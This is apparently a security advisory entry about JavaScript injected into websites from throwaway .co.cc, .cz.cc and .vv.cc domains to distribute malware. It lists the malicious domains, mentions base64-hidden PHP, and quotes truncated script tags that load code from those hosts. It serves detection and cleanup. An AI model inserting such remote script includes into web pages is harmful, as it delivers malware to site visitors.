Description: Javascript included from a .co.cc domain, used to distribute malware.
Domains used:
ironydon.co.cc
google-analytisc.co.cc
js-o-kcjh.cz.cc
js-o-wiuf.cz.cc
oiihgw.co.cc
oiwdd.co.cc
pojdue.co.cc
berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
gb3hnh3nf.co.cc
http://republikainfo.com/templates/beez5/javascript/html.js
Affecting: Any web site (no traffic specified)
Clean up: Malware is generally hidden behin a base64 encoded block on PHP. Contact b>support@sucuri.net</b if you have questions or want us to clean it up for you.
Malware dump:
<script type=''text/javascript`` src='"'http://aiqoiwdd.co.cc/50..
<script type=''text/javascript`` src='"'http://www.ironydon.co.cc/main.js?global..
<script type=''text/javascript`` src='"'http://oiwdd.co.cc/50..